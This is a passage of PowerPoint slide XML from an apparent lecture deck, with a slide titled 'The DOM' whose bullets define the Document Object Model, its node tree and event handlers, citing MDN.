            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6DD9744-2C03-C84B-B202-B876A6351AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="847248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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32D5D67F-5244-9146-B13E-9F476F65B879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893936C5-A49F-0B40-BC8A-512D8479B886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7362825"/>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5" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2911ADD0-B0CD-804D-9B14-323DCF16BF5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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6" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2723D028-3092-5C41-9FC8-9449020F826C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7434263"/>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7" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D20639C-C54F-B04C-A516-C82DEDF03825}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9712325" y="7391400"/>
            <a:ext cx="44450" cy="42863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 20320"/>
              <a:gd name="T1" fmla="*/ 0 h 20320"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 20320"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 20320"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20320" h="20320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20330" y="20311"/>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8" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59872C1C-520C-7E4E-B920-5734A7BCAD82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9653588" y="7331075"/>
            <a:ext cx="65087" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 30479"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T7" fmla="*/ 0 h 30479"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T9" fmla="*/ 0 h 30479"/>
              <a:gd name="T10" fmla="*/ 0 w 30479"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T12" fmla="*/ 0 w 30479"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T14" fmla="*/ 0 w 30479"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 304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479" h="30479">
                <a:moveTo>
                  <a:pt x="30388" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30388" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="15180"/>
                </a:lnTo>
                <a:close/>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19" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B311A1F-D986-FE46-8C7F-B9107A2C1694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9480550" y="7323138"/>
            <a:ext cx="103188" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2035069958 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 0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5096" y="49699"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38471" y="45808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47750" y="35706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47067" y="17943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41428" y="6143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15804" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4953" y="9550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20495"/>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20" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D5F3458-60C1-6F4D-B484-CA52F1731019}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9445625" y="7362825"/>
            <a:ext cx="65088"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21" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2AC1D2-B19C-7746-9F77-83BD3D19C251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9815513" y="7323138"/>
            <a:ext cx="107950" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 0 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 621453573 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 2147483646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2697" y="49705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9214" y="45814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="17940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="6138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32001" y="2169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42849" y="9563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47796" y="20516"/>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22" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73DB31BB-24C1-F94A-97B5-95047411DBE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9888538" y="7362825"/>
            <a:ext cx="66675"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39CD5D6A-E653-8B45-BC51-D13B52B9C871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="2051050" cy="477837"/>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09" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="506" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128024" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEB97454-B74C-DA4D-B6C7-A8883F611E69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3608388" y="1633538"/>
            <a:ext cx="90487" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 41910"/>
              <a:gd name="T1" fmla="*/ 2147483646 w 41910"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="T1" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="41910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="41565" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="5054">
            <a:solidFill>
              <a:srgbClr val="7F7F7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025" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11AAB52C-DDFD-264B-B2CF-E7768F46BE4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="990600"/>
            <a:ext cx="8467725"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400">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[Ref] Introduction to the DOM. https://developer.mozilla.org/en- US/docs/DOM/DOM Reference/Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="550"/>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Document Object Model (DOM) is a programming interface for HTML, XML and SVG documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="888"/>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DOM provides a structured representation of the document (a tree) and it defines a way that the structure can be accessed from programs so that they can change the document structure, style and content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="888"/>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The DOM provides a representation of the document as a structured group of nodes and objects that have properties and methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="888"/>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Nodes can also have event handlers attached to them, and once that event is triggered the event handlers get executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="888"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" baseline="7000">
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>◮  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Essentially, it connects web pages to scripts or programming languages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEEC72EA-484B-F24E-9FA7-F9032725D575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="56114">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-188">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-188">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>27</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5C3E253D-24C4-CD4E-A6EE-C6DF334F3938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130051" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39D24EAD-FAAF-E94D-B5BA-4C88B03FE256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="428625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"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pic>
        <p:nvPicPr>
          <p:cNvPr id="130052" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C78C652B-54A5-774B-8228-51925EF8A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09800"/>
            <a:ext cx="7993063" cy="5176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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50803B5B-10A4-0542-AF07-42EA80673EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="2051050" cy="477837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82768" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="506" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:endParaRPr sz="3100" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9012A87A-EE51-AC4A-8B51-4C13F73E517D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="734853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75" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E8D1411-33AD-6447-BB05-8BBEFF24D5EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="767556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820" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177820" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203210" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17782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1076" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EB4A764-6F19-B747-B9F7-1B314BFA0872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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77" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D5E716-4902-384A-B8A8-0F584B1B1789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="737711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78" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D31B1D-8992-6248-813B-78C7257C72FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
